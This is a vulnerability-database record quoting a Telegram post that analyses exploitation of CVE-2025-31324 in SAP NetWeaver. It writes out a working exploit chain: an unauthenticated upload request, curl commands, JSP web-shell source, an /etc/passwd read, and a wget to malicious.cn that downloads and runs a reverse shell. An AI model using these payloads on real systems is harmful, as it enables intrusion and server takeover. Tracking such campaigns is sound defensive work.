{"uuid": "c8b9e34c-252c-457a-983c-119dba33a333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-31324", "type": "exploited", "source": "https://t.me/ViralCyber/13205", "content": "\u23f2   A China-linked group named Chaya_004 has exploited the critical vulnerability CVE-2025-31324 in SAP NetWeaver. This vulnerability is in the Visual Composer module, specifically in the MetadataUploader service at the path /developmentserver/metadatauploader. This service is meant to upload metadata files for developers. 
But SAP made a fatal mistake: this endpoint is open without any kind of authentication!\nThis endpoint simply receives a file via the POST method and stores it on the system, without checking who the user is. Now, if the uploaded file is a .jsp script, SAP NetWeaver loads it as a dynamic asset and executes it on the server!\n\n   \ud83d\udc48 What does that mean? It means:\nPOST /developmentserver/metadatauploader HTTP/1.1\nHost: target-victim.com\nContent-Type: multipart/form-data; boundary=boundary\n\n--boundary\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.jsp\"\nContent-Type: application/octet-stream\n\n&lt;% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %&gt;\n--boundary--\n   \ud83d\udc48 After that, you only need to go to:\nhttp://target-victim.com/VCService/shell.jsp?cmd=whoami\nAnd that's it! 
The code runs on the server.\n\n\ud83d\udd39  Stage two: detailed implementation - Exploit Chain\n   \ud83d\udc48 Step 1: Uploading JSP Web Shell\ncurl -X POST http://victim.com/developmentserver/metadatauploader \\\n  -F \"file=@shell.jsp\" -H \"Content-Type: multipart/form-data\"\nContents of shell.jsp:\n&lt;%@ page import=\"java.io.*\" %&gt;\n&lt;%\nString cmd = request.getParameter(\"cmd\");\nProcess p = Runtime.getRuntime().exec(cmd);\nBufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));\nString line = null;\nwhile ((line = reader.readLine()) != null) {\n    out.println(line);\n}\n%&gt;\n   \ud83d\udc48 Step 2: Remote code execution\ncurl \"http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd\"\n\n\ud83d\udd39  Stage three: Persistence with SuperShell\nWhat did they install after the exploit? A GoLang-style reverse shell named SuperShell. This tool is like Cobalt Strike but lighter and stealthier.\n   \ud83d\udc48 Interesting features of SuperShell:\n          \u2b05\ufe0f One. Cross-platform (Linux/Windows)\n          \u2b05\ufe0f Two. TLS encrypted reverse shell\n          \u2b05\ufe0f Three. 
Single-binary file, loadable through this same RCE\n          \u2b05\ufe0f Four. With command execution, interactive TTY, and file upload and download\n   \ud83d\udc48 How did they install the shell?\nThe .jsp file makes a simple curl or wget request to their CDN server and downloads the Golang shell file:\n&lt;%\nString[] cmd = {\"/bin/sh\", \"-c\", \"wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &amp;\"};\nRuntime.getRuntime().exec(cmd);\n%&gt;\n\n\ud83d\udd39  Infrastructure and C2 Network\nThe hackers did not just pull off a simple RCE; the whole attack structure resembles an advanced kill chain:\n          \u2b05\ufe0f One. Recon: tools such as ARL and Pocassist for finding vulnerable SAP systems\n          \u2b05\ufe0f Two. 
Exploit: using CVE-2025-31324 with a curl/python script\n          \u2b05\ufe0f Three. Payload: loading SuperShell via .jsp\n          \u2b05\ufe0f Four. C2: tunneling traffic through SoftEther VPN and NPS (a Chinese reverse proxy)\n          \u2b05\ufe0f Five. Persistence: tools such as Go Simple Tunnel or Cobalt Strike for persistent backdoors\n          \u2b05\ufe0f Six. Evade: encrypted communication, DNS redirection, and files with meaningless names such as ssonkfrd.jsp\n\n\ud83d\udd39  Final analysis: why is this attack special?\n          \u2b05\ufe0f One. Zero Auth RCE on a critical ERP like SAP means penetration into the heart of the organization.\n          \u2b05\ufe0f Two. The attack is fully automatable with ready-made PoC tools.\n          \u2b05\ufe0f Three. 
Golang payloads like SuperShell confuse antivirus products, because the binary file is unknown.\n          \u2b05\ufe0f Four. Using open-source and Chinese tools makes identifying the APT harder.\n\n\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b \ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83e\udee1\ud83d\udd2b\ud83d\udd2b\n\u23e9 @CyberWarfar", "creation_timestamp": "2025-05-11T23:42:16.000000Z"}